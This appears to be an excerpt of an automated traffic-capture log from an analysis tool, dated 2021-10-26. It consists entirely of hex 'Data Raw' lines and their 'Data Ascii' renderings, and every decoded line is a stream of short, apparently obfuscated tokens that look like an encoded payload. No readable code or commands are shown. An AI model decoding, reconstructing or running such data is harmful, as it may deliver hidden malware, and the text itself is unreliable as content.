                                                                                                2021-10-26 15:35:11 UTC1888INData Raw: 4d 20 4d 54 70 20 54 55 54 20 54 4d 50 20 54 53 6e 20 50 67 20 6e 69 20 54 50 50 20 6e 50 20 54 54 4f 20 54 55 53 20 54 53 69 20 54 67 54 20 69 53 20 4d 4d 4d 20 50 53 20 54 50 4f 20 55 54 20 54 67 20 4d 54 70 20 54 6e 4f 20 54 4d 50 20 55 67 20 69 55 20 54 70 67 20 54 50 50 20 54 4f 54 20 54 4d 6e 20 4d 55 20 54 53 4f 20 4d 67 55 20 54 50 4f 20 4d 4d 67 20 70 67 20 4f 50 20 55 69 20 6e 69 20 70 4f 20 4d 54 53 20 54 54 67 20 69 67 20 69 55 20 54 50 50 20 54 50 50 20 54 70 4d 20 54 4d 6e 20 6e 70 20 54 53 69 20 54 4f 50 20 54 50 4f 20 50 53 20 70 53 20 54 54 4f 20 55 54 20 54 4d 4f 20 54 54 54 20 54 53 54 20 54 4d 70 20 54 54 50 20 50 67 20 54 69 53 20 54 50 50 20 4f 54 20 54 4d 69 20 50 4d 20 54 54 54 20 54 50 50 20 54 50 4d 20 54 69 67 20 50 53 20 54 54
                                                                                                Data Ascii: M MTp TUT TMP TSn Pg ni TPP nP TTO TUS TSi TgT iS MMM PS TPO UT Tg MTp TnO TMP Ug iU Tpg TPP TOT TMn MU TSO MgU TPO MMg pg OP Ui ni pO MTS TTg ig iU TPP TPP TpM TMn np TSi TOP TPO PS pS TTO UT TMO TTT TST TMp TTP Pg TiS TPP OT TMi PM TTT TPP TPM Tig PS TT
                                                                                                2021-10-26 15:35:11 UTC1892INData Raw: 4f 70 20 4d 53 20 4f 4f 20 4f 69 20 69 55 20 4d 67 69 20 54 50 4f 20 54 54 53 20 54 4d 53 20 4d 50 20 54 53 4f 20 4d 67 6e 20 54 50 50 20 54 6e 4d 20 50 53 20 4f 53 20 55 69 20 4d 4d 4f 20 4d 4d 67 20 4f 67 20 54 4d 6e 20 69 67 20 50 69 20 54 4f 67 20 69 69 20 54 4d 4d 20 4f 6e 20 70 53 20 54 53 4f 20 54 67 54 20 69 53 20 55 6e 20 50 53 20 4d 53 6e 20 55 54 20 54 4d 4f 20 54 54 54 20 54 70 54 20 4f 55 20 70 6e 20 50 67 20 54 4f 67 20 69 69 20 4d 53 69 20 54 54 50 20 69 20 54 53 69 20 54 50 4d 20 69 70 20 54 50 53 20 50 53 20 4d 67 20 55 54 20 54 4d 4f 20 54 54 54 20 4d 54 50 20 4f 4f 20 54 69 6e 20 50 4d 20 54 4f 67 20 69 69 20 54 69 69 20 4f 6e 20 54 6e 4d 20 54 53 50 20 54 67 67 20 54 67 54 20 4d 4d 4f 20 67 67 20 4d 67 54 20 55 53 20 54 4d 53 20 54 4f
                                                                                                Data Ascii: Op MS OO Oi iU Mgi TPO TTS TMS MP TSO Mgn TPP TnM PS OS Ui MMO MMg Og TMn ig Pi TOg ii TMM On pS TSO TgT iS Un PS MSn UT TMO TTT TpT OU pn Pg TOg ii MSi TTP i TSi TPM ip TPS PS Mg UT TMO TTT MTP OO Tin PM TOg ii Tii On TnM TSP Tgg TgT MMO gg MgT US TMS TO
                                                                                                2021-10-26 15:35:11 UTC1908INData Raw: 53 20 70 55 20 70 69 20 4f 50 20 50 69 20 6e 20 54 20 55 20 54 54 4d 20 4f 6e 20 6e 67 20 70 50 20 70 70 20 69 4f 20 67 54 20 4f 54 20 70 67 20 50 20 4f 4d 20 70 55 20 4f 54 20 4f 54 20 69 4f 20 4f 4d 20 70 53 20 67 20 69 20 55 6e 20 70 70 20 4f 67 20 6e 53 20 6e 20 4d 67 20 6e 20 4d 6e 20 4d 50 20 55 54 20 55 50 20 70 50 20 50 69 20 54 4f 20 6e 20 4d 55 20 4f 20 69 4f 20 6e 53 20 70 55 20 70 69 20 4f 50 20 50 69 20 6e 20 54 20 55 20 54 54 4d 20 54 4d 6e 20 55 54 20 70 69 20 70 4f 20 70 53 20 54 4f 20 4d 50 20 54 53 4f 20 67 69 20 6e 54 20 4f 69 20 6e 53 20 4f 50 20 50 6e 20 4d 67 20 50 70 20 55 20 69 20 4f 53 20 4f 50 20 55 70 20 54 4d 70 20 50 67 20 4d 55 20 54 6e 20 54 20 4d 54 20 50 53 20 4f 55 20 6e 54 20 55 55 20 67 4d 20 4d 6e 20 4d 69 20 55 20 67
                                                                                                Data Ascii: S pU pi OP Pi n T U TTM On ng pP pp iO gT OT pg P OM pU OT OT iO OM pS g i Un pp Og nS n Mg n Mn MP UT UP pP Pi TO n MU O iO nS pU pi OP Pi n T U TTM TMn UT pi pO pS TO MP TSO gi nT Oi nS OP Pn Mg Pp U i OS OP Up TMp Pg MU Tn T MT PS OU nT UU gM Mn Mi U g
                                                                                                2021-10-26 15:35:11 UTC1924INData Raw: 20 55 69 20 55 54 20 6e 4d 20 4d 55 20 67 50 20 54 53 6e 20 4f 54 20 55 6e 20 6e 20 4d 67 20 69 55 20 69 55 20 54 53 20 70 67 20 4f 55 20 50 20 54 53 54 20 4f 69 20 54 70 20 67 50 20 6e 54 20 4d 70 20 50 54 20 54 4d 50 20 55 55 20 54 54 50 20 54 54 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20 54 20 54 53 67 20 53 20 70 55 20 4f 4d 20 67 67 20 53 20 67 69 20 67 70 20 4d 69 20 55 53 20 55 70 20 70 6e 20 4d 20 54 54 4d 20 67 4d 20 4d 70 20 69 4d 20 69 53 20 54 4d 54 20 54 4d 67 20 54 53 53 20 55 53 20 53 20 4d 69 20 70 69 20 67 4d 20 50 55 20 54 54 4d 20 55 50 20 4f 4d 20 54 53 55 20 69 4f 20 6e 20 6e 54 20 4d 70 20 69 4f 20 6e 53 20 4f 50 20 54 54 67 20 54 4d 69 20 4d 54 20 50 70 20 69 69 20 55 53 20 54 54 4d 20 54 6e 20 54 67 20 70 6e 20 70 4f 20 69 69 20
                                                                                                Data Ascii: Ui UT nM MU gP TSn OT Un n Mg iU iU TS pg OU P TST Oi Tp gP nT Mp PT TMP UU TTP TT TSP TTi Up US T TSg S pU OM gg S gi gp Mi US Up pn M TTM gM Mp iM iS TMT TMg TSS US S Mi pi gM PU TTM UP OM TSU iO n nT Mp iO nS OP TTg TMi MT Pp ii US TTM Tn Tg pn pO ii
                                                                                                2021-10-26 15:35:11 UTC1940INData Raw: 4d 6e 20 4d 4d 20 69 4d 20 70 70 20 4d 4f 20 6e 4d 20 54 4d 50 20 6e 54 20 54 50 20 54 54 20 55 69 20 55 54 20 6e 4d 20 4d 55 20 55 20 54 4d 50 20 69 20 67 20 54 54 50 20 4d 6e 20 50 54 20 6e 6e 20 50 4f 20 50 4d 20 55 54 20 6e 69 20 6e 69 20 55 50 20 4d 50 20 70 67 20 67 6e 20 69 54 20 6e 67 20 54 4d 4d 20 6e 53 20 54 53 20 67 20 67 70 20 54 70 20 4d 55 20 70 54 20 67 53 20 54 53 4d 20 55 4d 20 6e 54 20 4f 67 20 50 6e 20 69 67 20 54 4d 20 69 54 20 50 6e 20 6e 20 54 53 70 20 69 20 54 54 53 20 54 53 55 20 50 54 20 6e 4d 20 54 53 4f 20 55 67 20 54 50 20 70 50 20 55 4f 20 54 20 4f 4f 20 6e 20 54 67 20 67 4d 20 50 54 20 54 53 70 20 54 54 67 20 55 54 20 54 53 53 20 54 54 20 70 69 20 70 4d 20 67 4d 20 50 4f 20 55 50 20 54 53 70 20 4f 54 20 54 53 54 20 50 55 20
                                                                                                Data Ascii: Mn MM iM pp MO nM TMP nT TP TT Ui UT nM MU U TMP i g TTP Mn PT nn PO PM UT ni ni UP MP pg gn iT ng TMM nS TS g gp Tp MU pT gS TSM UM nT Og Pn ig TM iT Pn n TSp i TTS TSU PT nM TSO Ug TP pP UO T OO n Tg gM PT TSp TTg UT TSS TT pi pM gM PO UP TSp OT TST PU
                                                                                                2021-10-26 15:35:11 UTC1956INData Raw: 4d 20 55 70 20 70 50 20 4f 6e 20 55 53 20 67 67 20 70 53 20 54 4d 20 4f 69 20 4d 20 54 20 54 4d 6e 20 54 53 67 20 4f 6e 20 54 69 20 70 6e 20 67 50 20 55 4f 20 69 4d 20 55 4f 20 54 67 20 50 53 20 4d 54 20 54 53 50 20 67 20 6e 20 4f 54 20 67 54 20 6e 54 20 54 4d 4d 20 54 53 4d 20 54 54 4f 20 54 53 4d 20 67 4d 20 4d 20 69 54 20 4d 4f 20 54 53 4f 20 67 20 54 53 69 20 54 55 20 69 4f 20 67 4f 20 67 6e 20 4f 54 20 67 70 20 54 54 67 20 6e 53 20 55 53 20 6e 53 20 6e 20 50 54 20 55 54 20 4d 53 20 69 4f 20 54 54 70 20 54 54 4f 20 4f 4d 20 70 6e 20 67 4d 20 70 4f 20 69 4f 20 55 4f 20 4d 6e 20 54 54 6e 20 4d 20 4d 4d 20 54 4d 6e 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20 54 20 54 53 54 20 55 67 20 54 53 6e 20 54 53 4d 20 50 54 20 70 54 20 70 67 20 69 69 20 67 50 20
                                                                                                Data Ascii: M Up pP On US gg pS TM Oi M T TMn TSg On Ti pn gP UO iM UO Tg PS MT TSP g n OT gT nT TMM TSM TTO TSM gM M iT MO TSO g TSi TU iO gO gn OT gp TTg nS US nS n PT UT MS iO TTp TTO OM pn gM pO iO UO Mn TTn M MM TMn TSP TTi Up US T TST Ug TSn TSM PT pT pg ii gP
                                                                                                2021-10-26 15:35:11 UTC1972INData Raw: 50 53 20 54 4f 20 54 50 20 6e 54 20 4d 6e 20 70 4f 20 69 69 20 50 4f 20 67 4d 20 55 53 20 55 20 55 69 20 4f 4d 20 50 53 20 54 54 20 50 53 20 4d 70 20 6e 4d 20 67 20 70 69 20 54 4d 4d 20 55 50 20 67 53 20 4d 69 20 4d 6e 20 4d 70 20 6e 6e 20 54 50 20 69 55 20 54 6e 20 54 54 20 67 6e 20 6e 50 20 4d 50 20 4d 6e 20 67 70 20 4f 50 20 4f 4f 20 53 20 54 20 69 55 20 70 53 20 70 6e 20 69 67 20 69 4f 20 4f 53 20 69 20 4f 50 20 55 69 20 4d 6e 20 4d 55 20 67 4f 20 67 53 20 67 67 20 54 50 20 54 67 20 50 53 20 4d 54 20 54 53 50 20 67 20 70 4f 20 53 20 67 20 70 55 20 54 4d 69 20 4f 67 20 50 20 50 53 20 50 6e 20 67 54 20 70 53 20 70 4f 20 6e 54 20 55 67 20 54 4d 67 20 54 54 4d 20 69 69 20 4d 50 20 54 6e 20 4d 69 20 4d 20 53 20 69 20 54 54 67 20 55 50 20 54 53 53 20 70 20
                                                                                                Data Ascii: PS TO TP nT Mn pO ii PO gM US U Ui OM PS TT PS Mp nM g pi TMM UP gS Mi Mn Mp nn TP iU Tn TT gn nP MP Mn gp OP OO S T iU pS pn ig iO OS i OP Ui Mn MU gO gS gg TP Tg PS MT TSP g pO S g pU TMi Og P PS Pn gT pS pO nT Ug TMg TTM ii MP Tn Mi M S i TTg UP TSS p
                                                                                                2021-10-26 15:35:11 UTC1988INData Raw: 54 54 70 20 54 54 54 20 4d 67 20 50 4f 20 6e 6e 20 69 67 20 70 4f 20 54 53 53 20 67 20 55 50 20 54 4d 50 20 4d 6e 20 70 4f 20 54 70 20 67 4d 20 4d 67 20 54 50 20 54 67 20 50 53 20 4d 54 20 54 53 50 20 67 20 50 4d 20 4d 53 20 67 50 20 55 6e 20 70 50 20 54 54 67 20 55 6e 20 69 20 54 20 6e 70 20 4d 50 20 67 4f 20 54 53 54 20 54 53 53 20 55 67 20 54 53 50 20 69 20 6e 69 20 50 70 20 55 4f 20 69 4d 20 55 50 20 54 67 20 54 50 20 50 69 20 54 54 4f 20 6e 4f 20 69 20 4d 4f 20 70 55 20 54 53 70 20 54 53 70 20 54 54 20 54 53 54 20 67 4f 20 70 50 20 70 4d 20 4f 67 20 70 55 20 4f 6e 20 67 20 69 20 54 4d 6e 20 54 54 4d 20 70 4f 20 67 69 20 50 20 69 20 70 4f 20 4f 6e 20 54 50 20 54 54 20 55 69 20 55 54 20 6e 4d 20 4d 55 20 4d 53 20 4f 55 20 54 54 70 20 6e 69 20 70 55 20
                                                                                                Data Ascii: TTp TTT Mg PO nn ig pO TSS g UP TMP Mn pO Tp gM Mg TP Tg PS MT TSP g PM MS gP Un pP TTg Un i T np MP gO TST TSS Ug TSP i ni Pp UO iM UP Tg TP Pi TTO nO i MO pU TSp TSp TT TST gO pP pM Og pU On g i TMn TTM pO gi P i pO On TP TT Ui UT nM MU MS OU TTp ni pU
                                                                                                2021-10-26 15:35:11 UTC2004INData Raw: 54 6e 20 55 70 20 69 20 6e 53 20 55 54 20 50 70 20 4d 20 50 4f 20 54 54 20 67 53 20 54 4d 6e 20 70 50 20 54 53 69 20 53 20 50 55 20 50 4d 20 67 53 20 70 54 20 67 4d 20 54 54 50 20 54 67 20 54 50 20 50 69 20 54 54 4f 20 6e 4f 20 69 20 50 70 20 69 6e 20 54 53 67 20 54 53 70 20 54 20 70 6e 20 70 53 20 4d 53 20 4d 20 50 55 20 4d 67 20 54 4d 67 20 4f 20 6e 54 20 54 54 70 20 67 50 20 6e 54 20 70 54 20 50 6e 20 70 6e 20 6e 69 20 54 54 67 20 54 50 20 54 54 20 55 69 20 55 54 20 6e 4d 20 4d 55 20 50 50 20 70 6e 20 70 4f 20 55 50 20 4f 50 20 54 53 55 20 54 20 70 6e 20 55 4f 20 67 50 20 54 20 6e 54 20 6e 69 20 54 54 53 20 54 6e 20 4d 4f 20 54 6e 20 4f 4d 20 67 50 20 4f 6e 20 6e 67 20 54 54 50 20 54 54 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20 54 20 4f 53 20 55 4f
                                                                                                Data Ascii: Tn Up i nS UT Pp M PO TT gS TMn pP TSi S PU PM gS pT gM TTP Tg TP Pi TTO nO i Pp in TSg TSp T pn pS MS M PU Mg TMg O nT TTp gP nT pT Pn pn ni TTg TP TT Ui UT nM MU PP pn pO UP OP TSU T pn UO gP T nT ni TTS Tn MO Tn OM gP On ng TTP TT TSP TTi Up US T OS UO
                                                                                                2021-10-26 15:35:11 UTC2020INData Raw: 20 6e 4f 20 54 54 6e 20 6e 55 20 6e 6e 20 70 6e 20 6e 67 20 50 20 54 53 54 20 50 67 20 67 55 20 54 67 20 4f 54 20 4d 4f 20 54 53 4d 20 4d 20 4f 55 20 4f 50 20 69 69 20 70 6e 20 50 69 20 70 54 20 6e 53 20 54 54 4f 20 54 53 53 20 67 20 54 4d 70 20 67 50 20 6e 4f 20 6e 4d 20 54 53 4f 20 55 67 20 54 50 20 70 50 20 54 53 6e 20 6e 53 20 54 70 20 70 69 20 54 67 20 4f 50 20 67 67 20 54 53 4d 20 54 4d 70 20 54 54 50 20 54 53 53 20 4d 70 20 50 70 20 4d 4d 20 67 20 69 53 20 6e 69 20 54 54 4f 20 4d 20 54 4d 54 20 70 4d 20 67 50 20 6e 4d 20 55 53 20 54 54 4d 20 54 6e 20 54 67 20 70 6e 20 67 20 54 54 4d 20 4d 70 20 67 4d 20 70 4d 20 67 67 20 54 54 50 20 54 53 70 20 54 4d 69 20 4f 54 20 54 6e 20 69 4d 20 4d 4d 20 50 70 20 54 4f 20 70 55 20 54 54 4f 20 54 53 53 20 54 54
                                                                                                Data Ascii: nO TTn nU nn pn ng P TST Pg gU Tg OT MO TSM M OU OP ii pn Pi pT nS TTO TSS g TMp gP nO nM TSO Ug TP pP TSn nS Tp pi Tg OP gg TSM TMp TTP TSS Mp Pp MM g iS ni TTO M TMT pM gP nM US TTM Tn Tg pn g TTM Mp gM pM gg TTP TSp TMi OT Tn iM MM Pp TO pU TTO TSS TT
                                                                                                2021-10-26 15:35:11 UTC2036INData Raw: 54 53 4f 20 54 6e 20 55 70 20 55 69 20 54 53 4f 20 54 54 6e 20 50 4f 20 67 54 20 50 20 54 20 4d 54 20 6e 53 20 55 50 20 55 70 20 50 69 20 54 4f 20 4d 67 20 54 20 67 6e 20 67 54 20 70 50 20 70 55 20 54 54 4f 20 55 55 20 67 4d 20 53 20 54 4d 20 54 53 4f 20 4d 67 20 55 6e 20 70 55 20 54 53 4f 20 54 54 4f 20 69 55 20 4d 4d 20 6e 20 55 20 67 20 70 50 20 54 4d 69 20 4f 54 20 70 4f 20 67 4d 20 54 54 69 20 70 20 55 20 69 20 54 53 4f 20 54 4d 69 20 4f 54 20 55 55 20 50 54 20 4d 67 20 6e 20 70 4d 20 69 20 55 67 20 70 55 20 55 6e 20 50 69 20 67 4f 20 4d 67 20 54 20 50 53 20 67 69 20 55 6e 20 4f 67 20 4f 67 20 70 70 20 69 4f 20 50 50 20 4d 6e 20 4f 20 67 4d 20 4f 67 20 55 4f 20 4f 4d 20 70 70 20 55 69 20 69 4f 20 4d 70 20 67 20 67 53 20 55 6e 20 55 67 20 6e 53 20 54
                                                                                                Data Ascii: TSO Tn Up Ui TSO TTn PO gT P T MT nS UP Up Pi TO Mg T gn gT pP pU TTO UU gM S TM TSO Mg Un pU TSO TTO iU MM n U g pP TMi OT pO gM TTi p U i TSO TMi OT UU PT Mg n pM i Ug pU Un Pi gO Mg T PS gi Un Og Og pp iO PP Mn O gM Og UO OM pp Ui iO Mp g gS Un Ug nS T
                                                                                                2021-10-26 15:35:11 UTC2052INData Raw: 54 6e 54 20 54 53 67 20 4d 67 70 20 54 67 20 50 55 20 67 69 20 54 6e 55 20 54 4f 4f 20 6e 53 20 4d 69 4d 20 54 50 4d 20 54 4d 6e 20 4d 69 4d 20 50 4f 20 67 69 20 54 6e 70 20 4d 54 4f 20 55 70 20 54 54 70 20 54 53 67 20 4d 67 70 20 54 50 6e 20 50 70 20 69 50 20 69 4f 20 70 4d 20 6e 67 20 54 54 4f 20 54 54 50 20 54 53 54 20 54 4d 53 20 69 6e 20 50 67 20 69 55 20 50 4d 20 55 70 20 54 54 54 20 54 54 4d 20 54 53 54 20 54 54 6e 20 50 55 20 69 50 20 50 50 20 70 4d 20 6e 67 20 54 54 67 20 54 4d 50 20 4f 4f 20 4f 55 20 54 6e 55 20 54 70 55 20 50 55 20 69 55 20 54 54 70 20 54 54 50 20 54 53 67 20 4d 67 70 20 54 67 20 70 53 20 50 67 20 54 55 20 50 50 20 55 50 20 54 54 54 20 54 54 55 20 54 53 70 20 55 53 20 69 4f 20 70 4d 20 69 6e 20 50 54 20 4f 4d 20 54 4d 4d 20 54
                                                                                                Data Ascii: TnT TSg Mgp Tg PU gi TnU TOO nS MiM TPM TMn MiM PO gi Tnp MTO Up TTp TSg Mgp TPn Pp iP iO pM ng TTO TTP TST TMS in Pg iU PM Up TTT TTM TST TTn PU iP PP pM ng TTg TMP OO OU TnU TpU PU iU TTp TTP TSg Mgp Tg pS Pg TU PP UP TTT TTU TSp US iO pM in PT OM TMM T
                                                                                                2021-10-26 15:35:11 UTC2068INData Raw: 20 54 69 20 54 54 4f 20 54 53 4d 20 4f 20 54 69 54 20 50 53 20 4d 69 50 20 70 70 20 4d 6e 20 54 4d 54 20 54 4f 69 20 54 4f 67 20 54 6e 54 20 67 20 4d 54 55 20 4d 53 67 20 54 4f 6e 20 54 69 6e 20 4d 50 53 20 4d 67 54 20 54 69 6e 20 4d 4f 20 4d 54 50 20 50 67 20 54 55 69 20 54 4d 70 20 54 67 4d 20 54 55 50 20 69 55 20 4d 53 53 20 54 54 54 20 54 55 54 20 55 54 20 54 6e 53 20 54 54 53 20 54 6e 67 20 4d 4d 4d 20 54 69 55 20 69 6e 20 55 55 20 50 70 20 4d 69 4f 20 54 69 69 20 54 67 4f 20 69 20 50 70 20 4d 4d 70 20 4d 50 54 20 55 4d 20 54 69 53 20 4d 53 6e 20 54 69 67 20 54 53 54 20 53 20 4d 54 67 20 50 67 20 4d 69 55 20 54 69 4f 20 4d 4d 6e 20 54 54 67 20 54 20 67 70 20 67 20 54 70 55 20 4d 4d 50 20 54 6e 54 20 54 70 69 20 4d 53 70 20 4f 69 20 54 4f 70 20 54 70
                                                                                                Data Ascii: Ti TTO TSM O TiT PS MiP pp Mn TMT TOi TOg TnT g MTU MSg TOn Tin MPS MgT Tin MO MTP Pg TUi TMp TgM TUP iU MSS TTT TUT UT TnS TTS Tng MMM TiU in UU Pp MiO Tii TgO i Pp MMp MPT UM TiS MSn Tig TST S MTg Pg MiU TiO MMn TTg T gp g TpU MMP TnT Tpi MSp Oi TOp Tp
                                                                                                2021-10-26 15:35:11 UTC2084INData Raw: 20 69 6e 20 54 4f 50 20 4d 53 20 54 70 53 20 54 54 6e 20 50 67 20 70 70 20 54 50 67 20 54 4d 4f 20 4d 54 67 20 6e 6e 20 54 50 67 20 69 6e 20 54 70 69 20 4d 54 55 20 6e 20 54 53 67 20 67 4d 20 54 54 6e 20 54 50 20 4d 67 6e 20 4d 70 20 50 55 20 54 54 20 70 67 20 54 6e 6e 20 69 20 4d 4d 70 20 70 50 20 54 6e 4f 20 70 4f 20 67 20 54 55 69 20 67 4d 20 4d 69 50 20 67 6e 20 4f 69 20 55 67 20 54 54 53 20 54 50 70 20 4d 53 67 20 53 20 50 69 20 54 67 50 20 54 55 20 54 4f 54 20 4f 50 20 54 54 53 20 54 69 50 20 6e 50 20 54 53 55 20 4f 53 20 55 20 4d 67 4d 20 54 4d 20 54 54 69 20 54 54 67 20 54 70 4d 20 4d 54 4f 20 54 4d 55 20 54 69 6e 20 54 4d 70 20 54 4f 4d 20 4d 4d 55 20 54 70 4d 20 4d 50 20 55 50 20 4d 4d 4d 20 4d 69 55 20 67 53 20 69 54 20 54 67 4d 20 54 67 50 20
                                                                                                Data Ascii: in TOP MS TpS TTn Pg pp TPg TMO MTg nn TPg in Tpi MTU n TSg gM TTn TP Mgn Mp PU TT pg Tnn i MMp pP TnO pO g TUi gM MiP gn Oi Ug TTS TPp MSg S Pi TgP TU TOT OP TTS TiP nP TSU OS U MgM TM TTi TTg TpM MTO TMU Tin TMp TOM MMU TpM MP UP MMM MiU gS iT TgM TgP
                                                                                                2021-10-26 15:35:11 UTC2100INData Raw: 20 54 55 20 4d 50 53 20 6e 69 20 55 70 20 54 67 70 20 4d 67 4d 20 54 50 54 20 54 4f 4d 20 54 4f 53 20 4d 69 50 20 69 4f 20 4d 69 6e 20 54 53 55 20 4f 50 20 4d 69 54 20 6e 4d 20 54 69 4f 20 4d 53 53 20 50 4d 20 54 70 69 20 54 70 55 20 54 6e 67 20 54 4d 70 20 6e 54 20 55 6e 20 54 4f 4f 20 69 54 20 69 55 20 4d 6e 20 54 54 50 20 54 67 50 20 4d 6e 20 54 69 20 70 53 20 54 50 70 20 54 4f 67 20 54 50 69 20 54 4f 50 20 4f 54 20 54 70 6e 20 54 4d 54 20 54 67 53 20 4d 50 4d 20 54 53 55 20 70 67 20 54 50 67 20 54 67 55 20 54 4d 4f 20 54 50 4f 20 55 53 20 4d 53 69 20 54 70 50 20 70 6e 20 67 54 20 4d 4d 70 20 54 67 70 20 4d 69 20 54 4f 55 20 4d 53 4f 20 55 4d 20 54 70 4f 20 54 54 54 20 4d 69 67 20 55 67 20 4f 69 20 6e 67 20 4d 67 69 20 4f 69 20 54 6e 53 20 54 54 53 20
                                                                                                Data Ascii: TU MPS ni Up Tgp MgM TPT TOM TOS MiP iO Min TSU OP MiT nM TiO MSS PM Tpi TpU Tng TMp nT Un TOO iT iU Mn TTP TgP Mn Ti pS TPp TOg TPi TOP OT Tpn TMT TgS MPM TSU pg TPg TgU TMO TPO US MSi TpP pn gT MMp Tgp Mi TOU MSO UM TpO TTT Mig Ug Oi ng Mgi Oi TnS TTS
                                                                                                2021-10-26 15:35:11 UTC2116INData Raw: 67 54 20 4d 54 69 20 4f 70 20 4d 50 20 54 4d 70 20 6e 20 54 6e 20 4d 20 4d 4d 4d 20 54 53 20 70 53 20 4f 69 20 4d 67 53 20 54 67 53 20 4d 53 6e 20 4d 6e 20 4d 67 53 20 4d 54 67 20 70 70 20 55 50 20 69 50 20 54 53 67 20 54 70 69 20 54 70 4d 20 54 67 53 20 54 55 54 20 55 69 20 54 4d 70 20 4d 50 20 4f 67 20 54 53 53 20 54 6e 20 54 6e 6e 20 54 53 55 20 54 70 67 20 55 4d 20 54 55 67 20 55 53 20 4d 50 20 4f 20 70 55 20 4d 67 55 20 54 54 67 20 54 70 54 20 67 4d 20 54 4f 4f 20 50 54 20 4d 69 6e 20 69 53 20 50 55 20 54 55 70 20 4d 67 4f 20 54 55 50 20 54 4d 69 20 4d 67 69 20 4d 69 70 20 69 4f 20 54 50 54 20 54 69 55 20 54 53 4d 20 54 53 4f 20 54 70 20 53 20 4d 67 4f 20 54 4d 50 20 4d 50 50 20 55 69 20 4d 6e 20 50 4f 20 4d 4d 54 20 54 50 50 20 4d 54 54 20 54 67 4d
                                                                                                Data Ascii: gT MTi Op MP TMp n Tn M MMM TS pS Oi MgS TgS MSn Mn MgS MTg pp UP iP TSg Tpi TpM TgS TUT Ui TMp MP Og TSS Tn Tnn TSU Tpg UM TUg US MP O pU MgU TTg TpT gM TOO PT Min iS PU TUp MgO TUP TMi Mgi Mip iO TPT TiU TSM TSO Tp S MgO TMP MPP Ui Mn PO MMT TPP MTT TgM
                                                                                                2021-10-26 15:35:11 UTC2132INData Raw: 4f 20 4d 67 20 54 67 50 20 54 55 4d 20 54 67 4d 20 54 4d 4f 20 4d 54 54 20 67 70 20 54 4d 53 20 67 55 20 54 6e 50 20 54 67 69 20 4d 54 69 20 4d 67 69 20 54 50 53 20 67 67 20 54 4d 4d 20 54 4f 70 20 67 4d 20 69 55 20 4f 70 20 4f 20 4d 50 20 67 20 54 53 53 20 4d 54 54 20 4f 6e 20 54 6e 20 54 4d 6e 20 4d 50 54 20 54 6e 70 20 54 55 4f 20 54 6e 54 20 4d 67 6e 20 54 53 6e 20 55 50 20 54 55 6e 20 4d 53 70 20 54 4f 20 4d 67 54 20 54 54 69 20 54 55 20 54 55 67 20 54 4f 70 20 55 55 20 4d 53 69 20 54 67 53 20 54 70 54 20 54 54 4f 20 4d 6e 20 55 53 20 54 55 6e 20 4d 67 53 20 4d 4d 6e 20 4d 50 4d 20 4d 53 53 20 50 69 20 54 4f 50 20 4d 50 50 20 54 50 54 20 54 67 53 20 54 67 20 69 50 20 4d 67 55 20 54 55 4d 20 54 69 55 20 54 67 67 20 70 20 54 4d 55 20 54 4f 67 20 4d 67
                                                                                                Data Ascii: O Mg TgP TUM TgM TMO MTT gp TMS gU TnP Tgi MTi Mgi TPS gg TMM TOp gM iU Op O MP g TSS MTT On Tn TMn MPT Tnp TUO TnT Mgn TSn UP TUn MSp TO MgT TTi TU TUg TOp UU MSi TgS TpT TTO Mn US TUn MgS MMn MPM MSS Pi TOP MPP TPT TgS Tg iP MgU TUM TiU Tgg p TMU TOg Mg
                                                                                                2021-10-26 15:35:11 UTC2148INData Raw: 70 54 20 55 6e 20 4d 53 50 20 4d 69 69 20 4d 53 53 20 69 4d 20 50 69 20 70 50 20 55 20 54 54 20 54 70 69 20 54 67 6e 20 54 70 55 20 54 53 55 20 6e 4d 20 69 67 20 69 69 20 4f 67 20 54 4d 4d 20 54 50 53 20 4f 69 20 54 67 6e 20 54 6e 67 20 6e 67 20 4d 53 53 20 54 4d 20 54 4d 53 20 54 53 55 20 54 67 4d 20 69 69 20 54 50 20 54 70 69 20 4d 69 70 20 54 53 4d 20 4d 53 6e 20 69 54 20 4d 50 67 20 4d 53 55 20 54 53 4d 20 54 4f 4d 20 54 67 55 20 54 70 4f 20 69 6e 20 67 54 20 54 4d 70 20 54 55 54 20 54 50 67 20 54 50 20 54 55 70 20 4f 50 20 50 53 20 54 4d 20 70 67 20 54 4d 4f 20 69 55 20 4d 67 53 20 54 67 20 4d 4d 55 20 54 6e 67 20 54 50 4d 20 4f 4f 20 54 6e 53 20 55 70 20 54 4d 4d 20 54 53 4f 20 54 4f 50 20 54 4d 69 20 54 4d 70 20 4d 54 69 20 4d 69 50 20 50 54 20 4d
                                                                                                Data Ascii: pT Un MSP Mii MSS iM Pi pP U TT Tpi Tgn TpU TSU nM ig ii Og TMM TPS Oi Tgn Tng ng MSS TM TMS TSU TgM ii TP Tpi Mip TSM MSn iT MPg MSU TSM TOM TgU TpO in gT TMp TUT TPg TP TUp OP PS TM pg TMO iU MgS Tg MMU Tng TPM OO TnS Up TMM TSO TOP TMi TMp MTi MiP PT M
                                                                                                2021-10-26 15:35:11 UTC2164INData Raw: 20 4d 50 20 55 6e 20 54 54 4d 20 54 67 4f 20 70 4f 20 70 67 20 54 69 70 20 67 6e 20 67 50 20 4d 67 4f 20 54 53 4d 20 54 67 6e 20 50 20 4d 67 70 20 4d 4d 50 20 6e 20 4d 67 6e 20 55 70 20 54 67 6e 20 4d 50 50 20 54 4f 54 20 54 50 69 20 54 6e 4d 20 54 4f 70 20 54 69 53 20 54 50 6e 20 54 50 70 20 54 69 50 20 54 70 4d 20 4f 50 20 69 20 54 54 6e 20 70 6e 20 67 50 20 4d 69 50 20 4f 4d 20 54 69 20 54 67 6e 20 55 4d 20 54 4d 69 20 54 4d 4d 20 4d 4d 67 20 54 53 70 20 54 50 4f 20 54 53 55 20 53 20 4d 67 69 20 4d 50 54 20 54 69 55 20 50 55 20 69 6e 20 4d 69 4d 20 55 67 20 4f 4d 20 69 4f 20 54 53 54 20 4f 53 20 55 70 20 4d 50 4d 20 54 6e 53 20 53 20 4d 67 4f 20 69 6e 20 55 6e 20 67 53 20 54 55 4d 20 69 67 20 54 70 69 20 54 4d 20 6e 67 20 54 4f 4f 20 54 55 53 20 55 6e
